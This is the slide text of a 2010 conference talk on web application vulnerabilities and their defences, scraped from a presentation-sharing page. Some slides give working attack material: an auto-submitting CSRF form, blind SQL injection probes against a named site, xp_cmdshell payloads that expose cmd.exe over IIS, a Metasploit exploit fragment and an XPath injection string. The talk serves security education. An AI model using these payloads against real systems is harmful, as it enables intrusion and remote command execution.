Web Attacks - Top threats - 2010


Published on

Covering top web attacks ...

  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide
  • The famous web application set up diagram. Walk through each component, mention their roles. Web client - HTTP connections Firewall - lets in only HTTP requests, and allows only outbound HTTP responses Web server - handles all initial requests Applications - run either on the web server, or on app servers Database - SQL databases, and connection interfaces
  • Web Attacks - Top threats - 2010

    1. 1. <ul><li>Session F3 </li></ul><ul><li>Defending against the worst web-based application vulnerabilities of 2010 </li></ul><ul><li>Date: Monday, 19 April 2010 Time: 3:45pm - 5pm </li></ul><ul><li>Shreeraj Shah </li></ul><ul><li>Founder and Director, Blueinfy; Author, Web 2.0 Security and Web Hacking: Attacks and Defense </li></ul>
    2. 2. Who Am I? <ul><li>Founder & Director </li></ul><ul><ul><li>Blueinfy Solutions Pvt. Ltd. (Brief) </li></ul></ul><ul><ul><li>SecurityExposure.com </li></ul></ul><ul><li>Past experience </li></ul><ul><ul><li>Net Square, Chase, IBM & Foundstone </li></ul></ul><ul><li>Interest </li></ul><ul><ul><li>Web security research </li></ul></ul><ul><li>Published research </li></ul><ul><ul><li>Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. </li></ul></ul><ul><ul><li>Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. </li></ul></ul><ul><ul><li>Advisories - .Net, Java servers etc. </li></ul></ul><ul><li>Books (Author) </li></ul><ul><ul><li>Web 2.0 Security – Defending Ajax, RIA and SOA </li></ul></ul><ul><ul><li>Hacking Web Services </li></ul></ul><ul><ul><li>Web Hacking </li></ul></ul>http://shreeraj.blogspot.com [email_address] http://www.blueinfy.com
    3. 3. 2010 - WEB ATTACKS
    4. 4. Real Life Analysis and Cases <ul><li>Accessing infrastructure through LDAP injection </li></ul><ul><li>Replicating full financial database from one Blind SQL injection </li></ul><ul><li>Accessing other user’s banking account through Logical business flaw </li></ul><ul><li>Client side control and hacking through CSRF and XSS </li></ul><ul><li>Results – Full control over web applications </li></ul>
    5. 5. Technology Trends <ul><li>Web 2.0 – Ajax, Silverlight and Flex/Flash </li></ul><ul><li>Web Services and SOA </li></ul><ul><li>Cloud APIs and SaaS </li></ul><ul><li>Browser empowering – HTML 5 and several other features </li></ul><ul><li>Traditional stacks are evolving around frameworks </li></ul>
    6. 6. Past, Present and Future Cloud 2010 Focus
    7. 7. Major Overlap in Web Apps Presentation Layer Business Layer Utility Layer Data Access Authentication Communication etc . Runtime, Platform, Operating System Components Server side Components Client side Components (Browser)
    8. 8. Next Generation Apps <ul><li>Site pageflakes.com (SaaS) </li></ul><ul><ul><li>Web 2.0 Start page </li></ul></ul><ul><ul><li>Mashup for various applications </li></ul></ul><ul><ul><li>Using .NET and Ajax technologies </li></ul></ul><ul><ul><li>Can access mails, news etc. from the same page </li></ul></ul><ul><ul><li>Various Widgets and modules </li></ul></ul>
    9. 9. Next Generation Architecture HTML / JS / DOM RIA (Flash) Ajax Browser Internet Blog Web 2.0 Start Database Authentication Application Infrastructure Web Services End point Internet Mails News Documents Weather Bank/Trade RSS feeds
    10. 10. OWASP & WASC/TC
    11. 11. Vulnerability distribution WASC Stats.
    13. 13. Client Side Vulnerabilities <ul><ul><li>V1 - XSS (DOM, Mashup, Widget, RSS feeds etc.) </li></ul></ul><ul><ul><li>V2 - CSRF (XML) </li></ul></ul><ul><ul><li>V3 - Redirects and Forwards (Phishing and Trust break) </li></ul></ul>
    14. 14. V1 - Distributed DOM driven XSS Web Server DB DB Web app attacker Web app Web app proxy Web Client 8008 XML/JSON/JS-Obj Stream eval() XSS
    15. 15. DOM Exploit Points <ul><ul><li>document.write(…) </li></ul></ul><ul><ul><li>document.writeln(…) </li></ul></ul><ul><ul><li>document.body.innerHtml=… </li></ul></ul><ul><ul><li>document.forms[0].action=… </li></ul></ul><ul><ul><li>document.attachEvent(…) </li></ul></ul><ul><ul><li>document.create…(…) </li></ul></ul><ul><ul><li>document.execCommand(…) </li></ul></ul><ul><ul><li>document.body. … </li></ul></ul><ul><ul><li>window.attachEvent(…) </li></ul></ul><ul><ul><li>document.location=… </li></ul></ul><ul><ul><li>document.location.hostname=… </li></ul></ul><ul><ul><li>document.location.replace(…) </li></ul></ul><ul><ul><li>document.location.assign(…) </li></ul></ul><ul><ul><li>document.URL=… </li></ul></ul><ul><ul><li>window.navigate(…) </li></ul></ul>
    16. 16. Exploiting RSS feeds <ul><li>RSS feeds consuming un-trusted sources. </li></ul><ul><li>Feed readers common component </li></ul><ul><li>Vulnerable to DOM driven XSS. </li></ul><ul><li>Malicious code injection and attaching browser. </li></ul>
    17. 17. Mashups Exploits <ul><li>API exposure for Mashup application. </li></ul><ul><li>Building applications with APIs </li></ul><ul><li>Cross Domain access by callback may cause a security breach. </li></ul><ul><li>Extensive DOM leverage – inject and exploit </li></ul>
    18. 18. Widgets/Gadgets Exploits <ul><li>DOM sharing model can cause many security issues. </li></ul><ul><li>One widget can change information on another widget – possible. </li></ul><ul><li>CSRF injection through widget code. </li></ul><ul><li>Event hijacking is possible – Common DOM </li></ul>
    19. 19. Defense <ul><li>Input validation and encoding </li></ul><ul><li>JavaScript – source code analysis </li></ul><ul><li>Widget – DOM sharing issue </li></ul><ul><li>Information validation and trusted source consumption </li></ul><ul><li>XSS protection and Cross Domain Blocking </li></ul>
    20. 20. V2 - Cross Site Request Forgery (CSRF) <ul><li>Next Generation CSRF </li></ul><ul><ul><li>Is it possible to do CSRF to XML stream </li></ul></ul><ul><ul><li>How? </li></ul></ul><ul><ul><li>It will be POST hitting the XML processing resources like Web Services </li></ul></ul><ul><ul><li>JSON CSRF is also possible </li></ul></ul><ul><ul><li>Interesting check to make against application and Web 2.0 resources </li></ul></ul>
    21. 21. One Way CSRF Scenario
    22. 22. One Way CSRF Scenario
    23. 23. One Way CSRF Scenario
    24. 24. One Way CSRF Scenario
    25. 25. One-Way CSRF
    26. 26. One-Way CSRF <ul><li><html> </li></ul><ul><li><body> </li></ul><ul><li><FORM NAME=&quot;buy&quot; ENCTYPE=&quot;text/plain&quot; action=&quot;http://trade.example.com/xmlrpc/trade.rem&quot; METHOD=&quot;POST&quot;> </li></ul><ul><li><input type=&quot;hidden&quot; name='<?xml version' value='&quot;1.0&quot;?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>' > </li></ul><ul><li></FORM> </li></ul><ul><li><script>document.buy.submit();</script> </li></ul><ul><li></body> </li></ul><ul><li></html> </li></ul>
    27. 27. Forcing XML <ul><li>Splitting XML stream in the form. </li></ul><ul><li>Possible through XForms as well. </li></ul><ul><li>Similar techniques is applicable to JSON as well. </li></ul>
    28. 28. Defense <ul><li>Server Side Checks </li></ul><ul><ul><li>Check for client’s content-type. </li></ul></ul><ul><ul><li>XHR calls – xml/application. </li></ul></ul><ul><ul><li>Native calls – text/html. </li></ul></ul><ul><ul><li>Filtering is possible on it. </li></ul></ul><ul><li>Client Side Checks </li></ul><ul><ul><li>Stream can be started and terminated by /* or any predefined characters. </li></ul></ul><ul><ul><li>Client can remove them before injecting to DOM. </li></ul></ul>
    29. 29. V3 – Redirects and Forward issues <ul><li>As a part of root cause, there must be a redirect hole </li></ul><ul><li>Example, </li></ul><ul><ul><li>http://foo.bank.com/login.aspx?user=xxx&page=trade.aspx </li></ul></ul><ul><li>Here “page” is a vulnerable parameter </li></ul><ul><li>What if? Some one put page=http://yahoo.com … </li></ul>
    30. 30. Attack Anatomy Attacker foo.bank.com <ul><ul><li>http://foo.bank.com/login.aspx?user=xxx& </li></ul></ul><ul><ul><li>page=http://yahoo.com </li></ul></ul>Get redirect or JavaScript call for loading yahoo.com Vulnerability detected!!! Detection
    31. 31. Attack Anatomy <ul><ul><li>Click the link </li></ul></ul>Get a redirect response to 203.88.XX.XX 1 Link in mail Threat
    32. 32. Attack Anatomy Bank’s user foo.bank.com <ul><ul><li>Click the link </li></ul></ul>Get a redirect response to 203.88.XX.XX 203.88.XX.XX (Attacker’s area) Bank’s user Send dummy form Trusted evil redirect 2
    33. 33. Attack Anatomy Bank’s user foo.bank.com <ul><ul><li>Click the link </li></ul></ul>Get a redirect response to 203.88.XX.XX 203.88.XX.XX (Attacker’s area) Bank’s user Send dummy form Bank’s user <ul><ul><li>Send username and password </li></ul></ul>Send dummy response (Thanks!) Trusted evil redirect 203.88.XX.XX (Attacker’s area) 3
    34. 34. Attack Anatomy Bank’s user foo.bank.com <ul><ul><li>Click the link </li></ul></ul>Get a redirect response to 203.88.XX.XX 203.88.XX.XX (Attacker’s area) Bank’s user Send dummy form Bank’s user <ul><ul><li>Send username and password </li></ul></ul>Send dummy response (Thanks!) Trusted evil redirect 203.88.XX.XX (Attacker’s area) Logs in and do money transfer 4
    35. 35. Defense <ul><li>Need to validate parameters before passing to redirect calls on server side </li></ul><ul><li>Filtering http:// or https:// </li></ul><ul><li>Do not pass values to JavaScript redirect before filtering or validating </li></ul><ul><li>Deployment level redirect should not rely on http parameters coming from user </li></ul><ul><li>Checking referrer on important forms </li></ul>
    37. 37. Server Side Vulnerabilities <ul><ul><li>V4 - Advanced SQL injection (Blind/XML/JSON) </li></ul></ul><ul><ul><li>V5 – XPATH Injection </li></ul></ul><ul><ul><li>V6 – Reverse Engineering </li></ul></ul><ul><ul><li>V7 – Logical Attacks </li></ul></ul><ul><ul><li>V8 – WSDL discovery </li></ul></ul><ul><ul><li>V9 – SOAP faultcode leakage </li></ul></ul><ul><ul><li>V10 – SOAP injections </li></ul></ul>
    38. 38. V4 - Advanced SQL injections <ul><li>SQL injection over JSON streams </li></ul><ul><li>Flash based points </li></ul><ul><li>XML data access layer exposure </li></ul><ul><li>Errors are not standard in 500 </li></ul><ul><li>200 and messages are embedded in the stream </li></ul>
    39. 39. Blind SQL Injection <ul><li>We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw. </li></ul><ul><li>Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”. </li></ul><ul><li>Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system. </li></ul><ul><li>We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command. </li></ul><ul><li>If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS. </li></ul>
    40. 40. Checks… <ul><li>AND 1=1 </li></ul><ul><li>DBO check </li></ul><ul><li>'dbo' </li></ul><ul><li>Wait delay call </li></ul><ul><li>;waitfor+delay+'0:0:10' </li></ul><ul><li>(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115 </li></ul><ul><li>http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114 </li></ul><ul><li>http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),2,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97 </li></ul>
    41. 41. Running tools <ul><li>SQL Map or Absinthe </li></ul><ul><ul><li>D: oolssqlmap>sqlmap.py -b -u </li></ul></ul><ul><ul><li>sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> </li></ul></ul><ul><ul><li>and belch <daniele.bellucci@gmail.com> </li></ul></ul><ul><ul><li>[*] starting at: 18:47:58 </li></ul></ul><ul><ul><li>[18:48:00] [WARNING] the remote DMBS is not MySQL </li></ul></ul><ul><ul><li>[18:48:00] [WARNING] the remote DMBS is not PostgreSQL </li></ul></ul><ul><ul><li>remote DBMS: Microsoft SQL Server </li></ul></ul><ul><ul><li>banner: </li></ul></ul><ul><ul><li>--- </li></ul></ul><ul><ul><li>Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) </li></ul></ul><ul><ul><li>Oct 14 2005 00:33:37 </li></ul></ul><ul><ul><li>Copyright (c) 1988-2005 Microsoft Corporation </li></ul></ul><ul><ul><li>Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) </li></ul></ul><ul><ul><li>--- </li></ul></ul><ul><ul><li>[*] shutting down at: 18:48:14 </li></ul></ul>
    42. 42. Exploiting <ul><li>Set WshShell = WScript.CreateObject(&quot;WScript.Shell&quot;) </li></ul><ul><li>Set ObjExec = WshShell.Exec(&quot;cmd.exe /c echo %windir%&quot;) </li></ul><ul><li>windir = ObjExec.StdOut.ReadLine() </li></ul><ul><li>Set Root = GetObject(&quot;IIS://LocalHost/W3SVC/1/ROOT&quot;) </li></ul><ul><li>Set Dir = Root.Create(&quot;IIsWebVirtualDir&quot;, &quot;secret&quot;) </li></ul><ul><li>Dir.Path = windir </li></ul><ul><li>Dir.AccessExecute = True </li></ul><ul><li>Dir.SetInfo </li></ul><ul><li>http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell = </li></ul><ul><li>WScript.CreateObject(&quot;WScript.Shell&quot;) > c:secret.vbs’ </li></ul><ul><li>… .. </li></ul><ul><li>… .. </li></ul><ul><li>… .. </li></ul><ul><li>http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo </li></ul><ul><li>>> c:secret.vbs’ </li></ul><ul><li>http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’ </li></ul>
    43. 43. Get the cmd.exe <ul><li>Run command over HTTP/HTTPS </li></ul><ul><li>http://target/secret/system32/cmd.exe?+/c+set </li></ul>
    44. 44. Metasploit … <ul><li>sub Exploit { </li></ul><ul><li>my $self = shift; </li></ul><ul><li>my $target_host = $self->GetVar('RHOST'); </li></ul><ul><li>my $target_port = $self->GetVar('RPORT'); </li></ul><ul><li>my $path = $self->GetVar('RPATH'); </li></ul><ul><li>my $vhost = $self->GetVar('VHOST'); </li></ul><ul><li>my @url = split(/#/, $path); </li></ul><ul><li>my @payload = </li></ul><ul><li>(&quot;EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject(&quot;WScript.Shell&quot;)>c:ecret.vbs'&quot;, </li></ul><ul><li>&quot;EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject(&quot;IIS://LocalHost/W3SVC/1/ROOT&quot;)>>c:ecret.vbs'&quot;, </li></ul><ul><li>&quot;EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create(&quot;IIsWebVirtualDir&quot;,&quot;secret&quot;)>>c:ecret.vb s'&quot;, </li></ul><ul><li>&quot;EXEC+master..xp_cmdshell+'echo+Dir.Path+=+&quot;c:inntystem32amp;quot;>>c:ecret.vbs'&quot;, </li></ul><ul><li>&quot;EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:ecret.vbs'&quot;, </li></ul><ul><li>&quot;EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:ecret.vbs'&quot;, </li></ul><ul><li>&quot;EXEC+master..xp_cmdshell+'cscript+c:ecret.vbs'&quot; </li></ul><ul><li>); </li></ul><ul><li>$self->PrintLine(&quot;[+] Sending SQL injection payload...&quot;); </li></ul><ul><li>for(my $count=0;$count<=6;$count++) </li></ul><ul><li>.. </li></ul>
    45. 45. V5 - XPATH injection <ul><li>XPATH parsing standard error </li></ul><ul><li>XPATH is method available for XML parsing </li></ul><ul><li>MS SQL server provides interface and one can get table content in XML format. </li></ul><ul><li>Once this is fetched one can run XPATH queries and obtain results. </li></ul><ul><li>What if username/password parsing done on using XPATH – XPATH injection </li></ul>
    46. 46. XPATH injection <ul><li>string fulltext = &quot;&quot;; </li></ul><ul><li>string coString = </li></ul><ul><li>&quot;Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass&quot;; </li></ul><ul><li>SqlXmlCommand co = new SqlXmlCommand(coString); </li></ul><ul><li>co.RootTag=&quot;Credential&quot;; </li></ul><ul><li>co.CommandType = SqlXmlCommandType.Sql; </li></ul><ul><li>co.CommandText = &quot;SELECT * FROM users for xml Auto&quot;; </li></ul><ul><li>XmlReader xr = co.ExecuteXmlReader(); </li></ul><ul><li>xr.MoveToContent(); </li></ul><ul><li>fulltext = xr.ReadOuterXml(); </li></ul><ul><li>XmlDocument doc = new XmlDocument(); </li></ul><ul><li>doc.LoadXml(fulltext); </li></ul><ul><li>string credential = &quot;//users[@username='&quot;+user+&quot;' and @password='&quot;+pass+&quot;']&quot;; </li></ul><ul><li>XmlNodeList xmln = doc.SelectNodes(credential); </li></ul><ul><li>string temp; </li></ul><ul><li>if(xmln.Count > 0) </li></ul><ul><li>{ </li></ul><ul><li>//True </li></ul><ul><li>} </li></ul><ul><li>else //false </li></ul>
    47. 47. XPATH injection <ul><li>string credential = &quot;//users[@username='&quot;+user+&quot;' and @password='&quot;+pass+&quot;']&quot;; </li></ul><ul><li>XPATH parsing can be leveraged by passing following string ' or 1=1 or ''=‘ </li></ul><ul><li>This will always true on the first node and user can get access as who ever is first user. </li></ul><ul><li>Bingo! </li></ul>
    48. 48. V6 - Revere Engineering <ul><li>It is possible to reverse engineer RIA apps </li></ul><ul><li>Attacking Flash and Silverlight components </li></ul><ul><li>Identifying hidden treasure and business logic </li></ul><ul><li>Crafting attacks based on enumerated information </li></ul>
    49. 49. V7 - Logical Attack <ul><li>Exploiting application layer weakness with logical issues </li></ul><ul><li>Accessing unauthorized information </li></ul><ul><li>Analyzing code – JavaScript analysis and logical errors </li></ul><ul><li>Several key areas can be exploited </li></ul><ul><li>Debugging and Reverse Engineering helps a lot </li></ul>
    50. 50. V8 - WSDL Discovery Attacks <ul><li>Search in the public domain </li></ul><ul><li>Tool – Search Engines </li></ul><ul><li>Look for wsdl,asmx,jws etc. </li></ul><ul><li>Filetype and allinurl </li></ul>
    51. 51. V9 - Fault code leakage with SOAP <ul><li>Fault code of web services spit lot of information about internal workings. </li></ul><ul><li>This attack can fetch internal paths, database interfaces etc. </li></ul><ul><li>Fault code is part of SOAP envelope and this helps an attacker to make logical deduction about assets. </li></ul>
    52. 52. V10 – SOAP injections (SQL) <ul><li>SQL injection can be done using SOAP traffic. </li></ul><ul><li>It is innovative way of identifying database interface points. </li></ul><ul><li>One can leverage xp_cmdshell via SOAP. </li></ul><ul><li>Back end database can be compromised using this attack. </li></ul>
    53. 53. Defending <ul><li>Input validations across streams – XML, JSON and Name-Value pairs </li></ul><ul><li>Not to put logic in client side components running in Flash and Silverlight </li></ul><ul><li>Extra attention and code review for logical attacks </li></ul><ul><li>WSDL and SOAP security around Web Services </li></ul>
    54. 54. Key Controls <ul><li>WAF for stream protection </li></ul><ul><li>Source Code Review during SDLC </li></ul><ul><li>Developers knowledge base </li></ul><ul><li>Secure API and Library usage across enterprise </li></ul><ul><li>Secure SDLC with various controls including threat modeling </li></ul><ul><li>Web 2.0 Attacks and Countermeasure strategies </li></ul>
    55. 55. CONCLUSION – QUESTIONS! [email_address] http://www.blueinfy.com